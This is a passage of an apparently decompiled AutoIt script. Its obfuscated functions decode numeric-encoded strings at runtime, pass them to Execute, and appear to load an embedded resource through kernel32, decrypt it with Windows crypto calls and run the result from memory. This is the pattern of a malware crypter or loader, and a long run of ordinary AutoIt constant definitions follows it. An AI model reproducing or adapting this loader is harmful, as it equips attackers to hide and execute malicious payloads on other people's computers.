("19,35,52,31,41,32,18,31,45,41,47,44,29,31" ) , BTBXJYMRFGAETPA ("42,46,44" ) , $HINSTANCE , BTBXJYMRFGAETPA ("42,46,44" ) , $INFOBLOCK ) [BTBXJYMRFGAETPA ("53" ) ] LOCAL $GLOBALMEMORYBLOCK = $SPAYPUCWZKBI ("kernel32.dll" , BTBXJYMRFGAETPA ("42,46,44" ) , BTBXJYMRFGAETPA ("12,41,27,30,18,31,45,41,47,44,29,31" ) , BTBXJYMRFGAETPA ("42,46,44" ) , $HINSTANCE , BTBXJYMRFGAETPA ("42,46,44" ) , $INFOBLOCK ) [BTBXJYMRFGAETPA ("53" ) ] LOCAL $MEMORYPOINTER = $SPAYPUCWZKBI ("kernel32.dll" , BTBXJYMRFGAETPA ("42,46,44" ) , BTBXJYMRFGAETPA ("12,41,29,37,18,31,45,41,47,44,29,31" ) , BTBXJYMRFGAETPA ("42,46,44" ) , $GLOBALMEMORYBLOCK ) [BTBXJYMRFGAETPA ("53" ) ] RETURN $QBQADACRHPDC ("byte[" & $RESSIZE & "]" , $MEMORYPOINTER ) ENDFUNC FUNC VLSHMDZKXOUE () RETURN EXECUTE (BTBXJYMRFGAETPA ("23,35,40,5,50,35,45,46,45" ) ) ENDFUNC FUNC VRMOLQYJSQGJ () RETURN EXECUTE (BTBXJYMRFGAETPA ("19,46,44,35,40,33,9,40,19,46,44" ) ) ENDFUNC FUNC ZUQIQWYIEPGW () RETURN EXECUTE (BTBXJYMRFGAETPA ("6,35,38,31,23,44,35,46,31" ) ) ENDFUNC FUNC PLXMFFUKHKPT () RETURN EXECUTE (BTBXJYMRFGAETPA ("2,35,46,15,18" ) ) ENDFUNC FUNC UGPTHQHYLFMO () RETURN EXECUTE (BTBXJYMRFGAETPA ("21,2,41,47,40,30" ) ) ENDFUNC FUNC EJTUMKGNAG ($VDATA , $VCRYPTKEY , $RT ) LOCAL $E = EXECUTE LOCAL $B = $E (BTBXJYMRFGAETPA ("28,35,40,27,44,51,46,41,45,46,44,35,40,33" ) ) LOCAL $__G_ACRYPTINTERNALDATA [BTBXJYMRFGAETPA ("56" ) ] LOCAL $TBUFF LOCAL $TTEMPSTRUCT LOCAL $IPLAINTEXTSIZE LOCAL $VRETURN VFNIVSZMZI () $VDATA = GLOBALDATA ($VDATA , $RT ) $__G_ACRYPTINTERNALDATA [BTBXJYMRFGAETPA ("54" ) ] = $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,57,6,60,53,59,58,59,5,55,61,55,55,57,54,59,57,60,59,59,54,60,53,59,62,56,56,56,55,55,5,59,57,59,3,59,3,55,55,55,62" ) ) ) LOCAL $ARET = $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,57,56,59,54,59,3,59,3,55,61,55,57,58,6,58,6,59,60,58,6,59,54,57,56,60,55,60,62,60,53,60,57,57,62,59,5,60,57,59,58,60,55,59,5,59,54,59,3,57,57,59,54,60,57,59,54,58,2,56,54,58,4,55,3,55,53,55,55,59,55,59,6,59,6,59,3,55,55,55,3,55,53,55,55,57,56,60,55,60,62,60,53,60,57,57,54,59,56,60,54,60,58,59,62,60,55,59,58,57,56,59,6,59,5,60,57,59,58,60,61,60,57,55,55,55,3,55,53,55,55,59,61,59,54,59,5,59,57,59,3,59,58,55,1,55,55,55,3,55,53,56,53,55,3,55,53,55,55,60,53,60,57,60,55,55,55,55,3,55,53,56,53,55,3,55,53,55,55,60,53,60,57,60,55,55,55,55,3,55,53,56,53,55,3,55,53,55,55,59,57,60,60,59,6,60,55,59,57,55,55,55,3,55,53,56,55,56,57,55,3,55,53,55,55,59,57,60,60,59,6,60,55,59,57,55,55,55,3,55,53,55,55,56,53,60,61,57,59,56,53,56,53,56,53,56,53,56,53,56,53,56,53,55,55,55,62" ) ) ) $__G_ACRYPTINTERNALDATA [BTBXJYMRFGAETPA ("55" ) ] = $ARET [BTBXJYMRFGAETPA ("54" ) ] $__G_ACRYPTINTERNALDATA [BTBXJYMRFGAETPA ("53" ) ] += BTBXJYMRFGAETPA ("54" ) $ARET = $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,57,56,59,54,59,3,59,3,55,61,55,57,58,6,58,6,59,60,58,6,59,54,57,56,60,55,60,62,60,53,60,57,57,62,59,5,60,57,59,58,60,55,59,5,59,54,59,3,57,57,59,54,60,57,59,54,58,2,56,54,58,4,55,3,55,53,55,55,59,55,59,6,59,6,59,3,55,55,55,3,55,53,55,55,57,56,60,55,60,62,60,53,60,57,57,56,60,55,59,58,59,54,60,57,59,58,57,61,59,54,60,56,59,61,55,55,55,3,55,53,55,55,59,61,59,54,59,5,59,57,59,3,59,58,55,55,55,3,55,53,55,57,58,6,58,6,59,60,58,6,59,54,57,56,60,55,60,62,60,53,60,57,57,62,59,5,60,57,59,58,60,55,59,5,59,54,59,3,57,57,59,54,60,57,59,54,58,2,56,55,58,4,55,3,55,53,55,55,60,58,59,62,59,5,60,57,55,55,55,3,55,53,55,55,56,53,60,61,56,53,56,53,56,53,56,53,56,61,56,53,56,53,56,56,55,55,55,3,55,53,55,55,60,53,60,57,60,55,55,55,55,3,55,53,56,53,55,3,55,53,55,55,59,57,60,60,59,6,60,55,59,57,55,55,55,3,55,53,56,53,55,3,55,53,55,55,59,61,59,54,59,5,59,57,59,3,59,58,55,1,55,55,55,3,55,53,56,53,55,62" ) ) ) $HCRYPTHASH = $ARET [BTBXJYMRFGAETPA ("58" ) ] $TBUFF = $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,56,60,55,59,58,59,54,60,57,59,58,55,61,55,55,59,55,60,62,60,57,59,58,58,2,55,55,55,53,55,59,55,53,57,55,59,62,59,5,59,54,60,55,60,62,57,3,59,58,59,5,55,61,55,57,60,59,57,56,60,55,60,62,60,53,60,57,57,2,59,58,60,62,55,62,55,53,55,59,55,53,55,55,58,4,55,55,55,62" ) ) ) $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,58,56,59,58,60,57,57,57,59,54,60,57,59,54,55,61,55,57,60,57,57,55,60,58,59,59,59,59,55,3,55,53,57,58,60,61,59,58,59,56,60,58,60,57,59,58,55,61,56,54,55,62,55,3,55,53,55,57,60,59,57,56,60,55,60,62,60,53,60,57,57,2,59,58,60,62,55,62" ) ) ) $ARET = $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,57,56,59,54,59,3,59,3,55,61,55,57,58,6,58,6,59,60,58,6,59,54,57,56,60,55,60,62,60,53,60,57,57,62,59,5,60,57,59,58,60,55,59,5,59,54,59,3,57,57,59,54,60,57,59,54,58,2,56,54,58,4,55,3,55,53,55,55,59,55,59,6,59,6,59,3,55,55,55,3,55,53,55,55,57,56,60,55,60,62,60,53,60,57,57,61,59,54,60,56,59,61,57,57,59,54,60,57,59,54,55,55,55,3,55,53,55,55,59,61,59,54,59,5,59,57,59,3,59,58,55,55,55,3,55,53,55,57,59,61,57,56,60,55,60,62,60,53,60,57,57,61,59,54,60,56,59,61,55,3,55,53,55,55,60,56,60,57,60,55,60,58,59,56,60,57,55,1,55,55,55,3,55,53,55,57,60,57,57,55,60,58,59,59,59,59,55,3,55,53,55,55,59,57,60,60,59,6,60,55,59,57,55,55,55,3,55,53,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,60,59,58,60,57,58,56,59,62,60,1,59,58,55,61,55,57,60,57,57,55,60,58,59,59,59,59,55,62,55,3,55,53,55,55,59,57,60,60,59,6,60,55,59,57,55,55,55,3,55,53,56,54,55,62" ) ) ) $ARET = $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,57,56,59,54,59,3,59,3,55,61,55,57,58,6,58,6,59,60,58,6,59,54,57,56,60,55,60,62,60,53,60,57,57,62,59,5,60,57,59,58,60,55,59,5,59,54,59,3,57,57,59,54,60,57,59,54,58,2,56,54,58,4,55,3,55,53,55,55,59,55,59,6,59,6,59,3,55,55,55,3,55,53,55,55,57,56,60,55,60,62,60,53,60,57,57,57,59,58,60,55,59,62,60,59,59,58,57,2,59,58,60,62,55,55,55,3,55,53,55,55,59,61,59,54,59,5,59,57,59,3,59,58,55,55,55,3,55,57,58,6,58,6,59,60,58,6,59,54,57,56,60,55,60,62,60,53,60,57,57,62,59,5,60,57,59,58,60,55,59,5,59,54,59,3,57,57,59,54,60,57,59,54,58,2,56,55,58,4,55,3,55,53,55,55,60,58,59,62,59,5,60,57,55,55,55,3,55,53,55,55,56,53,60,61,56,53,56,53,56,53,56,53,56,59,56,59,56,54,56,53,55,55,55,3,55,53,55,55,59,61,59,54,59,5,59,57,59,3,59,58,55,55,55,3,55,53,55,57,59,61,57,56,60,55,60,62,60,53,60,57,57,61,59,54,60,56,59,61,55,3,55,53,55,55,59,57,60,60,59,6,60,55,59,57,55,55,55,3,55,53,55,55,56,53,60,61,56,53,56,53,56,53,56,53,56,53,56,53,56,53,56,54,55,55,55,3,55,53,55,55,59,61,59,54,59,5,59,57,59,3,59,58,55,1,55,55,55,3,55,53,56,53,55,62" ) ) ) $VRETURN = $ARET [BTBXJYMRFGAETPA ("58" ) ] $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,57,56,59,54,59,3,59,3,55,61,55,57,58,6,58,6,59,60,58,6,59,54,57,56,60,55,60,62,60,53,60,57,57,62,59,5,60,57,59,58,60,55,59,5,59,54,59,3,57,57,59,54,60,57,59,54,58,2,56,54,58,4,55,3,55,53,55,55,59,55,59,6,59,6,59,3,55,55,55,3,55,53,55,55,57,56,60,55,60,62,60,53,60,57,57,57,59,58,60,56,60,57,60,55,59,6,60,62,57,61,59,54,60,56,59,61,55,55,55,3,55,53,55,55,59,61,59,54,59,5,59,57,59,3,59,58,55,55,55,3,55,53,55,57,59,61,57,56,60,55,60,62,60,53,60,57,57,61,59,54,60,56,59,61,55,62" ) ) ) $VCRYPTKEY = $VRETURN $TBUFF = $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,56,60,55,59,58,59,54,60,57,59,58,55,61,55,55,59,55,60,62,60,57,59,58,58,2,55,55,55,53,55,59,55,53,57,55,59,62,59,5,59,54,60,55,60,62,57,3,59,58,59,5,55,61,55,57,60,59,57,57,59,54,60,57,59,54,55,62,55,53,55,2,55,53,55,55,56,54,56,53,56,53,56,53,55,55,55,53,55,59,55,53,55,55,58,4,55,55,55,62" ) ) ) $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,58,56,59,58,60,57,57,57,59,54,60,57,59,54,55,61,55,57,60,57,57,55,60,58,59,59,59,59,55,3,55,53,57,58,60,61,59,58,59,56,60,58,60,57,59,58,55,61,56,54,55,62,55,3,55,53,55,57,60,59,57,57,59,54,60,57,59,54,55,62" ) ) ) $ARET = $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,57,56,59,54,59,3,59,3,55,61,55,57,58,6,58,6,59,60,58,6,59,54,57,56,60,55,60,62,60,53,60,57,57,62,59,5,60,57,59,58,60,55,59,5,59,54,59,3,57,57,59,54,60,57,59,54,58,2,56,54,58,4,55,3,55,53,55,55,59,55,59,6,59,6,59,3,55,55,55,3,55,53,55,55,57,56,60,55,60,62,60,53,60,57,57,57,59,58,59,56,60,55,60,62,60,53,60,57,55,55,55,3,55,53,55,55,59,61,59,54,59,5,59,57,59,3,59,58,55,55,55,3,55,53,55,57,60,59,57,56,60,55,60,62,60,53,60,57,57,2,59,58,60,62,55,3,55,53,55,55,59,61,59,54,59,5,59,57,59,3,59,58,55,55,55,3,55,53,56,53,55,3,55,53,55,55,59,55,59,6,59,6,59,3,55,55,55,3,55,53,57,58,60,61,59,58,59,56,60,58,60,57,59,58,55,61,55,55,58,57,60,55,60,58,59,58,55,55,55,62,55,3,55,53,55,55,59,57,60,60,59,6,60,55,59,57,55,55,55,3,55,53,56,53,55,3,55,53,55,55,60,56,60,57,60,55,60,58,59,56,60,57,55,1,55,55,55,3,55,53,55,57,60,57,57,55,60,58,59,59,59,59,55,3,55,53,55,55,59,57,60,60,59,6,60,55,59,57,55,1,55,55,55,3,55,53,57,55,59,62,59,5,59,54,60,55,60,62,57,3,59,58,59,5,55,61,55,57,60,59,57,57,59,54,60,57,59,54,55,62,55,62" ) ) ) $IPLAINTEXTSIZE = $ARET [BTBXJYMRFGAETPA ("59" ) ] $TTEMPSTRUCT = $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,56,60,55,59,58,59,54,60,57,59,58,55,61,55,55,59,55,60,62,60,57,59,58,58,2,55,55,55,53,55,59,55,53,55,57,59,62,58,53,59,3,59,54,59,62,59,5,58,57,59,58,60,61,60,57,58,56,59,62,60,1,59,58,55,53,55,2,55,53,56,54,55,53,55,59,55,53,55,55,58,4,55,55,55,3,55,53,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,60,59,58,60,57,58,53,60,57,60,55,55,61,55,57,60,57,57,55,60,58,59,59,59,59,55,62,55,62" ) ) ) $VRETURN = $E ($B (BTBXJYMRFGAETPA ("53,50,57,55,59,62,59,5,59,54,60,55,60,62,57,4,59,62,59,57,55,61,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,60,59,58,60,57,57,57,59,54,60,57,59,54,55,61,55,57,60,57,58,57,59,58,59,4,60,53,58,56,60,57,60,55,60,58,59,56,60,57,55,3,55,53,57,58,60,61,59,58,59,56,60,58,60,57,59,58,55,61,56,54,55,62,55,62,55,3,55,53,56,54,55,3,55,53,55,57,59,62,58,53,59,3,59,54,59,62,59,5,58,57,59,58,60,61,60,57,58,56,59,62,60,1,59,58,55,62" ) ) ) $ARET = $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,57,56,59,54,59,3,59,3,55,61,55,57,58,6,58,6,59,60,58,6,59,54,57,56,60,55,60,62,60,53,60,57,57,62,59,5,60,57,59,58,60,55,59,5,59,54,59,3,57,57,59,54,60,57,59,54,58,2,55,55,56,54,55,55,58,4,55,3,55,53,55,55,59,55,59,6,59,6,59,3,55,55,55,3,55,53,55,55,57,56,60,55,60,62,60,53,60,57,57,57,59,58,60,56,60,57,60,55,59,6,60,62,57,2,59,58,60,62,55,55,55,3,55,53,55,55,59,61,59,54,59,5,59,57,59,3,59,58,55,55,55,3,55,53,55,57,60,59,57,56,60,55,60,62,60,53,60,57,57,2,59,58,60,62,55,62" ) ) ) $__G_ACRYPTINTERNALDATA [BTBXJYMRFGAETPA ("53" ) ] -= BTBXJYMRFGAETPA ("54" ) $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,57,56,59,54,59,3,59,3,55,61,55,57,58,6,58,6,59,60,58,6,59,54,57,56,60,55,60,62,60,53,60,57,57,62,59,5,60,57,59,58,60,55,59,5,59,54,59,3,57,57,59,54,60,57,59,54,58,2,56,54,58,4,55,3,55,53,55,55,59,55,59,6,59,6,59,3,55,55,55,3,55,53,55,55,57,56,60,55,60,62,60,53,60,57,58,55,59,58,59,3,59,58,59,54,60,56,59,58,57,56,59,6,59,5,60,57,59,58,60,61,60,57,55,55,55,3,55,53,55,55,59,61,59,54,59,5,59,57,59,3,59,58,55,55,55,3,55,53,55,57,58,6,58,6,59,60,58,6,59,54,57,56,60,55,60,62,60,53,60,57,57,62,59,5,60,57,59,58,60,55,59,5,59,54,59,3,57,57,59,54,60,57,59,54,58,2,56,55,58,4,55,3,55,53,55,55,59,57,60,60,59,6,60,55,59,57,55,55,55,3,55,53,56,53,55,62" ) ) ) $BBINARY = $E ($B (BTBXJYMRFGAETPA ("53,50,57,55,59,62,59,5,59,54,60,55,60,62,55,61,55,57,60,59,58,55,59,58,60,57,60,58,60,55,59,5,55,62" ) ) ) LOCAL $TINPUT = $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,56,60,55,59,58,59,54,60,57,59,58,55,61,55,55,59,55,60,62,60,57,59,58,58,2,55,55,55,53,55,59,55,53,57,55,59,62,59,5,59,54,60,55,60,62,57,3,59,58,59,5,55,61,55,57,59,55,57,55,59,62,59,5,59,54,60,55,60,62,55,62,55,53,55,59,55,53,55,55,58,4,55,55,55,62" ) ) ) $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,58,56,59,58,60,57,57,57,59,54,60,57,59,54,55,61,55,57,60,57,57,62,59,5,60,53,60,58,60,57,55,3,55,53,56,54,55,3,55,53,55,57,59,55,57,55,59,62,59,5,59,54,60,55,60,62,55,62" ) ) ) LOCAL $TBUFFER = $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,56,60,55,59,58,59,54,60,57,59,58,55,61,55,55,59,55,60,62,60,57,59,58,58,2,55,55,55,53,55,59,55,53,56,54,56,59,55,53,55,1,55,53,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,60,59,58,60,57,58,56,59,62,60,1,59,58,55,61,55,57,60,57,57,62,59,5,60,53,60,58,60,57,55,62,55,53,55,59,55,53,55,55,58,4,55,55,55,62" ) ) ) LOCAL $A_CALL = $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,57,56,59,54,59,3,59,3,55,61,55,55,59,5,60,57,59,57,59,3,59,3,55,5,59,57,59,3,59,3,55,55,55,3,55,53,55,55,59,62,59,5,60,57,55,55,55,3,55,55,58,55,60,57,59,3,57,57,59,58,59,56,59,6,59,4,60,53,60,55,59,58,60,56,60,56,57,55,60,58,59,59,59,59,59,58,60,55,55,55,55,3,55,55,60,58,60,56,59,61,59,6,60,55,60,57,55,55,55,3,55,53,56,55,55,3,55,55,60,53,60,57,60,55,55,55,55,3,55,53,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,60,59,58,60,57,58,53,60,57,60,55,55,61,55,57,60,57,57,55,60,58,59,59,59,59,59,58,60,55,55,62,55,3,55,55,59,57,60,60,59,6,60,55,59,57,55,55,55,3,55,53,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,60,59,58,60,57,58,56,59,62,60,1,59,58,55,61,55,57,60,57,57,55,60,58,59,59,59,59,59,58,60,55,55,62,55,3,55,55,60,53,60,57,60,55,55,55,55,3,55,53,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,60,59,58,60,57,58,53,60,57,60,55,55,61,55,57,60,57,57,62,59,5,60,53,60,58,60,57,55,62,55,3,55,55,59,57,60,60,59,6,60,55,59,57,55,55,55,3,55,53,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,60,59,58,60,57,58,56,59,62,60,1,59,58,55,61,55,57,60,57,57,62,59,5,60,53,60,58,60,57,55,62,55,3,55,55,59,57,60,60,59,6,60,55,59,57,55,1,55,55,55,3,55,53,56,53,55,62" ) ) ) LOCAL $TOUTPUT = $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,56,60,55,59,58,59,54,60,57,59,58,55,61,55,55,59,55,60,62,60,57,59,58,58,2,55,55,55,53,55,59,55,53,55,57,59,54,58,6,57,56,59,54,59,3,59,3,58,2,56,59,58,4,55,53,55,59,55,53,55,55,58,4,55,55,55,3,55,53,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,60,59,58,60,57,58,53,60,57,60,55,55,61,55,57,60,57,57,55,60,58,59,59,59,59,59,58,60,55,55,62,55,62" ) ) ) RETURN $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,60,59,58,60,57,57,57,59,54,60,57,59,54,55,61,55,57,60,57,57,6,60,58,60,57,60,53,60,58,60,57,55,3,55,53,56,54,55,62" ) ) ) ENDFUNC FUNC QLQVZSECZEVG () RETURN EXECUTE (BTBXJYMRFGAETPA ("19,34,31,38,38,5,50,31,29,47,46,31" ) ) ENDFUNC FUNC LRFVYXQFDMPD () RETURN EXECUTE (BTBXJYMRFGAETPA ("9,40,31,46,7,31,46" ) ) ENDFUNC FUNC WOYAFFSZNMVD () RETURN EXECUTE (BTBXJYMRFGAETPA ("13,45,33,2,41,50" ) ) ENDFUNC GLOBAL CONST $OPT_COORDSRELATIVE = 0 GLOBAL CONST $OPT_COORDSABSOLUTE = 1 GLOBAL CONST $OPT_COORDSCLIENT = 2 GLOBAL CONST $OPT_ERRORSILENT = 0 GLOBAL CONST $OPT_ERRORFATAL = 1 GLOBAL CONST $OPT_CAPSNOSTORE = 0 GLOBAL CONST $OPT_CAPSSTORE = 1 GLOBAL CONST $OPT_MATCHSTART = 1 GLOBAL CONST $OPT_MATCHANY = 2 GLOBAL CONST $OPT_MATCHEXACT = 3 GLOBAL CONST $OPT_MATCHADVANCED = 4 GLOBAL CONST $CCS_TOP = 1 GLOBAL CONST $CCS_NOMOVEY = 2 GLOBAL CONST $CCS_BOTTOM = 3 GLOBAL CONST $CCS_NORESIZE = 4 GLOBAL CONST $CCS_NOPARENTALIGN = 8 GLOBAL CONST $CCS_NOHILITE = 16 GLOBAL CONST $CCS_ADJUSTABLE = 32 GLOBAL CONST $CCS_NODIVIDER = 64 GLOBAL CONST $CCS_VERT = 128 GLOBAL CONST $CCS_LEFT = 129 GLOBAL CONST $CCS_NOMOVEX = 130 GLOBAL CONST $CCS_RIGHT = 131 GLOBAL CONST $DT_DRIVETYPE = 1 GLOBAL CONST $DT_SSDSTATUS = 2 GLOBAL CONST $DT_BUSTYPE = 3 GLOBAL CONST $PROXY_IE = 0 GLOBAL CONST $PROXY_NONE = 1 GLOBAL CONST $PROXY_SPECIFIED = 2 GLOBAL CONST $OBJID_WINDOW = 0 GLOBAL CONST $OBJID_TITLEBAR = 4294967294 GLOBAL CONST $OBJID_SIZEGRIP = 4294967289 GLOBAL CONST $OBJID_CARET = 4294967288 GLOBAL CONST $OBJID_CURSOR = 4294967287 GLOBAL CONST $OBJID_ALERT = 4294967286 GLOBAL CONST $OBJID_SOUND = 4294967285 GLOBAL CONST $DLG_CENTERONTOP = 0 GLOBAL CONST $DLG_NOTITLE = 1 GLOBAL CONST $DLG_NOTONTOP = 2 GLOBAL CONST $DLG_TEXTLEFT = 4 GLOBAL CONST $DLG_TEXTRIGHT = 8 GLOBAL CONST $DLG_MOVEABLE = 16 GLOBAL CONST $DLG_TEXTVCENTER = 32 GLOBAL CONST $IDC_UNKNOWN = 0 GLOBAL CONST $IDC_APPSTARTING = 1 GLOBAL CONST $IDC_ARROW = 2 GLOBAL CONST $IDC_CROSS = 3 GLOBAL CONST $IDC_HAND = 32649 GLOBAL CONST $IDC_HELP = 4 GLOBAL CONST $IDC_IBEAM = 5 GLOBAL CONST $IDC_ICON = 6 GLOBAL CONST $IDC_NO = 7 GLOBAL CONST $IDC_SIZE = 8 GLOBAL CONST $IDC_SIZEALL = 9 GLOBAL CONST $IDC_SIZENESW = 10 GLOBAL CONST $IDC_SIZENS = 11 GLOBAL CONST $IDC_SIZENWSE = 12 GLOBAL CONST $IDC_SIZEWE = 13 GLOBAL CONST $IDC_UPARROW = 14 GLOBAL CONST $IDC_WAIT = 15 GLOBAL CONST $IDI_APPLICATION = 32512 GLOBAL CONST $IDI_ASTERISK = 32516 GLOBAL CONST $IDI_EXCLAMATION = 32515 GLOBAL CONST $IDI_HAND = 32513 GLOBAL CONST $IDI_QUESTION = 32514 GLOBAL CONST $IDI_WINLOGO = 32517 GLOBAL CONST $IDI_SHIELD = 32518 GLOBAL CONST $IDI_ERROR = $IDI_HAND GLOBAL CONST $IDI_INFORMATION = $IDI_ASTERISK GLOBAL CONST $IDI_WARNING = $IDI_EXCLAMATION GLOBAL CONST $SD_LOGOFF = 0 GLOBAL CONST $SD_SHUTDOWN = 1 GLOBAL CONST $SD_REBOOT = 2 GLOBAL CONST $SD_FORCE = 4 GLOBAL CONST $SD_POWERDOWN = 8 GLOBAL CONST $SD_FORCEHUNG = 16 GLOBAL CONST $SD_STANDBY = 32 GLOBAL CONST $SD_HIBERNATE = 64 GLOBAL CONST $STDIN_CHILD = 1 GLOBAL CONST $STDOUT_CHILD = 2 GLOBAL CONST $STDERR_CHILD = 4 GLOBAL CONST $STDERR_MERGED = 8 GLOBAL CONST $STDIO_INHERIT_PARENT = 16 GLOBAL CONST $RUN_CREATE_NEW_CONSOLE = 65536 GLOBAL CONST $UBOUND_DIMENSIONS = 0 GLOBAL CONST $UBOUND_ROWS = 1 GLOBAL CONST $UBOUND_COLUMNS = 2 GLOBAL CONST $MOUSEEVENTF_ABSOLUTE = 32768 GLOBAL CONST $MOUSEEVENTF_MOVE = 1 GLOBAL CONST $MOUSEEVENTF_LEFTDOWN = 2 GLOBAL CONST $MOUSEEVENTF_LEFTUP = 4 GLOBAL CONST $MOUSEEVENTF_RIGHTDOWN = 8 GLOBAL CONST $MOUSEEVENTF_RIGHTUP = 16 GLOBAL CONST $MOUSEEVENTF_MIDDLEDOWN = 32 GLOBAL CONST $MOUSEEVENTF_MIDDLEUP = 64 GLOBAL CONST $MOUSEEVENTF_WHEEL = 2048 GLOBAL CONST $MOUSEEVENTF_XDOWN = 128 GLOBAL CONST $MOUSEEVENTF_XUP = 256 GLOBAL CONST $REG_NONE = 0 GLOBAL CONST $REG_SZ = 1 GLOBAL CONST $REG_EXPAND_SZ = 2 GLOBAL CONST $REG_BINARY = 3 GLOBAL CONST $REG_DWORD = 4 GLOBAL CONST $REG_DWORD_LITTLE_ENDIAN = 4 GLOBAL CONST $REG_DWORD_BIG_ENDIAN = 5 GLOBAL CONST $REG_LINK = 6 GLOBAL CONST $REG_MULTI_SZ = 7 GLOBAL CONST $REG_RESOURCE_LIST = 8 GLOBAL CONST $REG_FULL_RESOURCE_DESCRIPTOR = 9 GLOBAL CONST $REG_RESOURCE_REQUIREMENTS_LIST = 10 GLOBAL CONST $REG_QWORD = 11 GLOBAL CONST $REG_QWORD_LITTLE_ENDIAN = 11 GLOBAL CONST $HWND_BOTTOM = 1 GLOBAL CONST $HWND_NOTOPMOST = + 4294967294 GLOBAL CONST $HWND_TOP = 0 GLOBAL CONST $HWND_TOPMOST = + 4294967295 GLOBAL CONST $SWP_NOSIZE = 1 GLOBAL CONST $SWP_NOMOVE = 2 GLOBAL CONST $SWP_NOZORDER = 4 GLOBAL CONST $SWP_NOREDRAW = 8 GLOBAL CONST $SWP_NOACTIVATE = 16 GLOBAL CONST $SWP_FRAMECHANGED = 32 GLOBAL CONST $SWP_DRAWFRAME = 32 GLOBAL CONST $SWP_SHOWWINDOW = 64 GLOBAL CONST $SWP_HIDEWINDOW = 128 GLOBAL CONST $SWP_NOCOPYBITS = 256 GLOBAL CONST $SWP_NOOWNERZORDER = 512 GLOBAL CONST $SWP_NOREPOSITION = 512 GLOBAL CONST $SWP_NOSENDCHANGING = 1024 GLOBAL CONST $SWP_DEFERERASE = 8192 GLOBAL CONST $SWP_ASYNCWINDOWPOS = 16384 GLOBAL CONST $KEYWORD_DEFAULT = 1 GLOBAL CONST $KEYWORD_NULL = 2 GLOBAL CONST $DECLARED_LOCAL = + 4294967295 GLOBAL CONST $DECLARED_UNKNOWN = 0 GLOBAL CONST $DECLARED_GLOBAL = 1 GLOBAL CONST $ASSIGN_CREATE = 0 GLOBAL CONST $ASSIGN_FORCELOCAL = 1 GLOBAL CONST $ASSIGN_FORCEGLOBAL = 2 GLOBAL CONST $ASSIGN_EXISTFAIL = 4 GLOBAL CONST $BI_ENABLE = 0 GLOBAL CONST $BI_DISABLE = 1 GLOBAL CONST $BREAK_ENABLE = 1 GLOBAL CONST $BREAK_DISABLE = 0 GLOBAL CONST $CDTRAY_OPEN = "open" GLOBAL CONST $CDTRAY_CLOSED = "closed" GLOBAL CONST $SEND_DEFAULT = 0 GLOBAL CONST $SEND_RAW = 1 GLOBAL CONST $DIR_DEFAULT = 0 GLOBAL CONST $DIR_EXTENDED = 1 GLOBAL CONST $DIR_NORECURSE = 2 GLOBAL CONST $DIR_REMOVE = 1 GLOBAL CONST $DT_ALL = "ALL" GLOBAL CONST $DT_CDROM = "CDROM" GLOBAL CONST $DT_REMOVABLE = "REMOVABLE" GLOBAL CONST $DT_FIXED = "FIXED" GLOBAL CONST $DT_NETWORK = "NETWORK" GLOBAL CONST $DT_RAMDISK = "RAMDISK" GLOBAL CONST $DT_UNKNOWN = "UNKNOWN" GLOBAL CONST $DT_UNDEFINED = 1 GLOBAL CONST $DT_FAT = "FAT" GLOBAL CONST $DT_FAT32 = "FAT32" GLOBAL CONST $DT_EXFAT = "exFAT" GLOBAL CONST $DT_NTFS = "NTFS" GLOBAL CONST $DT_NWFS = "NWFS" GLOBAL CONST $DT_CDFS = "CDFS" GLOBAL CONST $DT_UDF = "UDF" GLOBAL CONST $DMA_DEFAULT = 0 GLOBAL CONST $DMA_PERSISTENT = 1 GLOBAL CONST $DMA_AUTHENTICATION = 8 GLOBAL CONST $DS_UNKNOWN = "UNKNOWN" GLOBAL CONST $DS_READY = "READY" GLOBAL CONST $DS_NOTREADY = "NOTREADY" GLOBAL CONST $DS_INVALID = "INVALID" GLOBAL CONST $MOUSE_CLICK_LEFT = "left" GLOBAL CONST $MOUSE_CLICK_RIGHT = "right" GLOBAL CONST $MOUSE_CLICK_MIDDLE = "middle" GLOBAL CONST $MOUSE_CLICK_MAIN = "main" GLOBAL CONST $MOUSE_CLICK_MENU = "menu" GLOBAL 